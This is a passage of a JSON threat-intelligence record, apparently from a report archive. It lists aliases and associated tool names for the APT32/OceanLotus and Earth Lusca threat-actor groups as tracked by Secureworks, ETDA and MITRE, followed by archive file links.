			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a76f3d080039a78ae0632cfb3e281e6143bf3534.pdf",
		"text": "https://archive.orkl.eu/a76f3d080039a78ae0632cfb3e281e6143bf3534.txt",
		"img": "https://archive.orkl.eu/a76f3d080039a78ae0632cfb3e281e6143bf3534.jpg"
	}
}